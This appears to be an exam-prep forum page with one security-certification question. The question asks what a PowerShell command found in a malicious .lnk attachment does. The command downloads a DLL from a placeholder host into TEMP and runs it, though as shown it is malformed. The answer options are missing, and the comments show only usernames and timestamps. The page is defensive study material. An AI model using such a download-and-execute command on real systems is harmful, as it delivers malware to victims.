An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
ApplebeesWaiter1122
Highly Voted 1 year, 11 months agoJarnBarn
1 year, 5 months agoAbdulaa
1 year, 9 months agoID77
1 year, 3 months agoUfuk_Ari
Highly Voted 2 years, 3 months agoZdane
2 years agobenni3c
1 year, 9 months agochiachuang
Most Recent 1 year, 7 months agoZaak
2 years, 2 months agosdc939
2 years, 3 months ago